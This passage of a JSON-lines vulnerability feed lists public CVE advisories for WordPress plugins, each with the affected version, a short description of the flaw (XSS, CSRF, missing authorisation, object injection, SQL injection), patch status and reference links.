replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sandbox\\\/trunk\\\/sandbox-ajax.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sandbox\\\/trunk\\\/sandbox-ajax.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59880d92-5d75-432f-9fb5-d74b13d101ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59880d92-5d75-432f-9fb5-d74b13d101ff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13112","slug":"wp-mediatagger","versionImpact":"4.1.1","description":"The WP MediaTagger WordPress plugin through 4.1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/155df231-30ef-47bb-aa91-a7deb1779bd1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/155df231-30ef-47bb-aa91-a7deb1779bd1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13866","slug":"simple-notification","versionImpact":"1.3","description":"The Simple Notification plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-notification\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-notification\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e814f798-5ebc-4bea-838f-d0a803f9bdbc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e814f798-5ebc-4bea-838f-d0a803f9bdbc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1320","slug":"teachpress","versionImpact":"9.0.9","description":"The teachPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 9.0.9. This is due to missing or incorrect nonce validation on the import.php page. This makes it possible for unauthenticated attackers to delete imports via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/teachpress\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/teachpress\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b677ad8b-4f01-4147-bcf6-ae769046be48?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b677ad8b-4f01-4147-bcf6-ae769046be48?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3056","slug":"download-manager","versionImpact":"3.3.12","description":"The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.3.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3275196\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3275196\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd9e6ba7-f107-4d7c-a7da-35e603f3a1a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd9e6ba7-f107-4d7c-a7da-35e603f3a1a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5236","slug":"ninjateam-telegram","versionImpact":"1.1","description":"The NinjaTeam Chat for Telegram plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018username\u2019 parameter in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninjateam-telegram\\\/trunk\\\/blocks\\\/src\\\/init.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninjateam-telegram\\\/trunk\\\/blocks\\\/src\\\/init.php#L130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302588\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302588\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ninjateam-telegram\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ninjateam-telegram\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/725feb15-aa9b-4c00-bb95-ee0616000a14?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/725feb15-aa9b-4c00-bb95-ee0616000a14?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-41129","slug":"patreon-connect","versionImpact":"1.8.6","description":"Cross-Site Request Forgery (CSRF) vulnerability in Patreon Patreon WordPress.This issue affects Patreon WordPress: from n\/a through 1.8.6.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/patreon-connect\\\/wordpress-patreon-wordpress-plugin-1-8-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/patreon-connect\\\/wordpress-patreon-wordpress-plugin-1-8-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7068","slug":"print-invoices-packing-slip-labels-for-woocommerce","versionImpact":"4.3.0","description":"The WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on theprint_packinglist action in all versions up to, and including, 4.3.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to export orders which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5abc282d-68c9-423c-a15c-d4d3f7035661?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5abc282d-68c9-423c-a15c-d4d3f7035661?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3014977%40print-invoices-packing-slip-labels-for-woocommerce&new=3014977%40print-invoices-packing-slip-labels-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3014977%40print-invoices-packing-slip-labels-for-woocommerce&new=3014977%40print-invoices-packing-slip-labels-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51536","slug":"crm-perks-forms","versionImpact":"1.1.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CRM Perks CRM Perks Forms \u2013 WordPress Form Builder allows Stored XSS.This issue affects CRM Perks Forms \u2013 WordPress Form Builder: from n\/a through 1.1.2.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/crm-perks-forms\\\/wordpress-crm-perks-forms-plugin-1-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/crm-perks-forms\\\/wordpress-crm-perks-forms-plugin-1-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1090","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the stopOptimizeAll function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify image optimization settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3fae909-5564-4e0a-9114-edd0e45865e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3fae909-5564-4e0a-9114-edd0e45865e5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1733","slug":"word-replacer-ultra","versionImpact":"1.0","description":"The Word Replacer Pro plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the word_replacer_ultra() function in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to update arbitrary content on the affected WordPress site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1da53718-c2a2-45d0-ad43-daff3c68342d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1da53718-c2a2-45d0-ad43-daff3c68342d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/word-replacer-ultra\\\/trunk\\\/inc\\\/word-replacer-ultra-ajax.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/word-replacer-ultra\\\/trunk\\\/inc\\\/word-replacer-ultra-ajax.php#L16\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0629","slug":"woocommerce-2checkout-payment","versionImpact":"6.2","description":"The 2Checkout Payment Gateway for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the sniff_ins function in all versions up to, and including, 6.2. This makes it possible for unauthenticated attackers to make changes to orders and mark them as paid.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcc6a4a5-b133-4ee1-a345-a7c812624b03?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcc6a4a5-b133-4ee1-a345-a7c812624b03?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-2checkout-payment\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-2checkout-payment\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4959","slug":"frontend-checklist","versionImpact":"2.3.2","description":"The Frontend Checklist WordPress plugin through 2.3.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/449e4da8-beae-4ff6-9ddc-0e17781c0391\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/449e4da8-beae-4ff6-9ddc-0e17781c0391\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-52461","slug":"infinite-slider","versionImpact":"2.0.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kinsta WordPress Hosting Infinite Slider allows Reflected XSS.This issue affects Infinite Slider: from n\/a through 2.0.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/infinite-slider\\\/vulnerability\\\/wordpress-infinite-slider-plugin-2-0-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/infinite-slider\\\/vulnerability\\\/wordpress-infinite-slider-plugin-2-0-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12208","slug":"wp-backitup","versionImpact":"1.50","description":"The Backup and Restore WordPress \u2013 Backup Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.50. This is due to missing or incorrect nonce validation on the ajax_queue_manual_backup() function. This makes it possible for unauthenticated attackers to trigger backups via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-backitup\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-backitup\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e461a04b-6456-4930-b3e7-0f808825aa6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e461a04b-6456-4930-b3e7-0f808825aa6b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13366","slug":"sandbox","versionImpact":"0.4","description":"The Sandbox plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'debug' parameter in all versions up to, and including, 0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sandbox\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sandbox\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fc752bb-3f1d-4106-9df1-361564905a55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fc752bb-3f1d-4106-9df1-361564905a55?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13101","slug":"wp-mediatagger","versionImpact":"4.1.1","description":"The WP MediaTagger WordPress plugin through 4.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/03f51b54-0ec2-40ce-a0fa-ef0c4ab0ea99\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/03f51b54-0ec2-40ce-a0fa-ef0c4ab0ea99\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13827","slug":"razorpay-subscription-button-elementor","versionImpact":"1.0.3","description":"The Razorpay Subscription Button Elementor Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg() and remove_query_arg() functions without appropriate escaping on the URL in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/razorpay-subscription-button-elementor\\\/tags\\\/1.0.3\\\/includes\\\/rzp-payment-buttons.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/razorpay-subscription-button-elementor\\\/tags\\\/1.0.3\\\/includes\\\/rzp-payment-buttons.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/razorpay-subscription-button-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/razorpay-subscription-button-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8cdde8d-db43-4702-81c3-ea2d867baa8d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8cdde8d-db43-4702-81c3-ea2d867baa8d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0602","slug":"twittee-text-tweet","versionImpact":"1.0.8","description":"The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c357f93d-4f21-4cd9-9378-d97756c75255\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c357f93d-4f21-4cd9-9378-d97756c75255\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51532","slug":"icegram","versionImpact":"3.1.19","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Icegram Icegram Engage \u2013 WordPress Lead Generation, Popup Builder, CTA, Optins and Email List Building allows Stored XSS.This issue affects Icegram Engage \u2013 WordPress Lead Generation, Popup Builder, CTA, Optins and Email List Building: from n\/a through 3.1.19.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/icegram\\\/wordpress-icegram-engage-plugin-3-1-19-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/icegram\\\/wordpress-icegram-engage-plugin-3-1-19-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1089","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the optimizeAllOn function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify image optimization settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ff16906-2516-4b3c-8217-e3fb24924e27?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ff16906-2516-4b3c-8217-e3fb24924e27?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1685","slug":"social-media-builder","versionImpact":"2.1.0","description":"The Social Media Share Buttons plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.1.0 via deserialization of untrusted input through the attachmentUrl parameter. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c17d18a-090f-4b35-a257-cfc0a16d5459?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c17d18a-090f-4b35-a257-cfc0a16d5459?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-media-builder\\\/trunk\\\/classes\\\/SgmbButton.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-media-builder\\\/trunk\\\/classes\\\/SgmbButton.php#L32\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4957","slug":"frontend-checklist","versionImpact":"2.3.2","description":"The Frontend Checklist WordPress plugin through 2.3.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0a560ed4-7dec-4274-b4a4-39dea0c0d67e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0a560ed4-7dec-4274-b4a4-39dea0c0d67e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5726","slug":"timeline-event-history","versionImpact":"3.1","description":"The Timeline Event History plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1 via deserialization of untrusted input 'timelines-data' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/107afaa6-6c0b-43fb-9713-ebc4f1189ea6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/107afaa6-6c0b-43fb-9713-ebc4f1189ea6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timeline-event-history\\\/trunk\\\/includes\\\/admin\\\/timeline-wp-build.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timeline-event-history\\\/trunk\\\/includes\\\/admin\\\/timeline-wp-build.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timeline-event-history\\\/trunk\\\/includes\\\/public\\\/templates\\\/style-another\\\/index.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timeline-event-history\\\/trunk\\\/includes\\\/public\\\/templates\\\/style-another\\\/index.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timeline-event-history\\\/trunk\\\/includes\\\/public\\\/templates\\\/style-one\\\/index.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timeline-event-history\\\/trunk\\\/includes\\\/public\\\/templates\\\/style-one\\\/index.php#L7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9626","slug":"zemanta","versionImpact":"1.3.3","description":"The Editorial Assistant by Sovrn plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_zemanta_set_featured_image' function in versions up to, and including, 1.3.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload attachment files (such as jpg, png, txt, zip), and set the post featured image.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8775662f-d007-4edf-826e-f755d7b11c25?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8775662f-d007-4edf-826e-f755d7b11c25?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zemanta\\\/tags\\\/1.3.3\\\/zemanta.php#L713\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zemanta\\\/tags\\\/1.3.3\\\/zemanta.php#L713\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12015","slug":"wedevs-project-manager","versionImpact":"2.6.16","description":"The 'Project Manager' WordPress Plugin is affected by an authenticated SQL injection vulnerability in the 'orderby' parameter in the '\/pm\/v2\/activites' route.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2024-47\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2024-47\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12207","slug":"toggles-shortcode-and-widget","versionImpact":"1.14","description":"The Toggles Shortcode and Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018content\u2019 parameter in all versions up to, and including, 1.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/toggles-shortcode-and-widget\\\/trunk\\\/include\\\/otw_components\\\/otw_shortcode\\\/shortcodes\\\/otw_shortcode_content_toggle.class.php#L246\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/toggles-shortcode-and-widget\\\/trunk\\\/include\\\/otw_components\\\/otw_shortcode\\\/shortcodes\\\/otw_shortcode_content_toggle.class.php#L246\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/755c8863-33c2-47aa-880a-0ef8b2d594a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/755c8863-33c2-47aa-880a-0ef8b2d594a3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12637","slug":"moving-users","versionImpact":"1.05","description":"The Moving Users plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.05 via the export functionality. The JSON files are stored in predictable locations with guessable file names when exporting user data. This could allow unauthenticated attackers to extract sensitive user data, for instance, email addresses, hashed passwords, and IP addresses.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/moving-users\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/moving-users\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8209761c-2cfe-49b9-ab4c-49a9a13b5dcf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8209761c-2cfe-49b9-ab4c-49a9a13b5dcf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
